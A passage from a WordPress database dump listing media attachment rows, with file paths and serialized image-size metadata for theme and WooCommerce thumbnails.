'),(51861,2864,'_wp_attached_file','2018/09/h5-rev-img-2a.jpg'),(51862,2864,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1620;s:6:\"height\";i:800;s:4:\"file\";s:25:\"2018/09/h5-rev-img-2a.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2a-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"h5-rev-img-2a-1024x506.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:506;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2a-768x379.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:379;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"h5-rev-img-2a-1536x759.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:759;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:26:\"h5-rev-img-2a-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2a-650x800.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:26:\"h5-rev-img-2a-1300x800.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h5-rev-img-2a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2a-600x296.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2a-600x296.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51863,2756,'_wp_attached_file','2018/09/landing-vector-img-8.png'),(51864,2756,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:548;s:6:\"height\";i:257;s:4:\"file\";s:32:\"2018/09/landing-vector-img-8.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-8-300x141.png\";s:5:\"width\";i:300;s:6:\"height\";i:141;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-vector-img-8-300x257.png\";s:5:\"width\";i:300;s:6:\"height\";i:257;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-8-300x257.png\";s:5:\"width\";i:300;s:6:\"height\";i:257;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51865,2489,'_wp_attached_file','2018/08/h3-team-member-img-3.jpg'),(51866,2489,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:345;s:6:\"height\";i:345;s:4:\"file\";s:32:\"2018/08/h3-team-member-img-3.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h3-team-member-img-3-300x345.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-3-300x345.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51867,2712,'_wp_attachment_image_alt','f'),(51868,2775,'_wp_attachment_image_alt','m'),(51869,2489,'_wp_attachment_image_alt','m'),(51870,2713,'_wp_attached_file','2018/09/landing-vector-img-2.png'),(51871,2713,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:79;s:6:\"height\";i:121;s:4:\"file\";s:32:\"2018/09/landing-vector-img-2.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-vector-img-2-79x100.png\";s:5:\"width\";i:79;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-vector-img-2-79x100.png\";s:5:\"width\";i:79;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51872,2756,'_wp_attachment_image_alt','g'),(51873,2713,'_wp_attachment_image_alt','f'),(51874,2776,'_wp_attached_file','2018/09/landing-img-15.jpg'),(51875,2776,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:26:\"2018/09/landing-img-15.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"landing-img-15-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"landing-img-15-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"landing-img-15-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"landing-img-15-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"landing-img-15-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"landing-img-15-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"landing-img-15-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"landing-img-15-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51876,2556,'_wp_attached_file','2018/09/landing-pop-up-top-character.jpg'),(51877,2556,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:700;s:4:\"file\";s:40:\"2018/09/landing-pop-up-top-character.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"landing-pop-up-top-character-300x109.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"landing-pop-up-top-character-1024x373.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"landing-pop-up-top-character-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"landing-pop-up-top-character-768x280.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:41:\"landing-pop-up-top-character-1536x560.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:40:\"landing-pop-up-top-character-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:41:\"landing-pop-up-top-character-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:40:\"landing-pop-up-top-character-650x700.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:41:\"landing-pop-up-top-character-1300x700.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:40:\"landing-pop-up-top-character-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:40:\"landing-pop-up-top-character-600x219.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:219;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:40:\"landing-pop-up-top-character-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:40:\"landing-pop-up-top-character-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:40:\"landing-pop-up-top-character-600x219.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:219;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:40:\"landing-pop-up-top-character-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51878,2202,'_wp_attachment_image_alt','m'),(51879,2757,'_wp_attached_file','2018/09/landing-print-img-5.jpg'),(51880,2714,'_wp_attached_file','2018/09/landing-vector-img-3.jpg'),(51881,2714,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:587;s:6:\"height\";i:587;s:4:\"file\";s:32:\"2018/09/landing-vector-img-3.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-vector-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51882,2757,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1060;s:6:\"height\";i:560;s:4:\"file\";s:31:\"2018/09/landing-print-img-5.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-print-img-5-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"landing-print-img-5-1024x541.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"landing-print-img-5-768x406.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:406;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:31:\"landing-print-img-5-650x560.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:31:\"landing-print-img-5-650x560.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-print-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-print-img-5-600x317.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:317;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"landing-print-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-print-img-5-600x317.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:317;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51883,2776,'_wp_attachment_image_alt','m'),(51884,2204,'_wp_attached_file','2018/08/h7-port-img-10.jpg'),(51885,2204,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:26:\"2018/08/h7-port-img-10.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h7-port-img-10-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"h7-port-img-10-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h7-port-img-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"h7-port-img-10-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:27:\"h7-port-img-10-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"h7-port-img-10-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:27:\"h7-port-img-10-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"h7-port-img-10-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:28:\"h7-port-img-10-1300x1100.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h7-port-img-10-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"h7-port-img-10-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h7-port-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"h7-port-img-10-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"h7-port-img-10-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h7-port-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51886,2864,'_wp_attachment_image_alt','m'),(51887,2714,'_wp_attachment_image_alt','f'),(51888,2757,'_wp_attachment_image_alt','a'),(51889,2556,'_wp_attachment_image_alt','d'),(51890,2777,'_wp_attached_file','2018/09/landing-img-16.jpg'),(51891,2777,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:26:\"2018/09/landing-img-16.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"landing-img-16-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"landing-img-16-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"landing-img-16-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"landing-img-16-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"landing-img-16-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"landing-img-16-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"landing-img-16-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"landing-img-16-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51892,2865,'_wp_attached_file','2018/09/h5-rev-img-2b.jpg'),(51893,2865,'_wp_attachment_metadat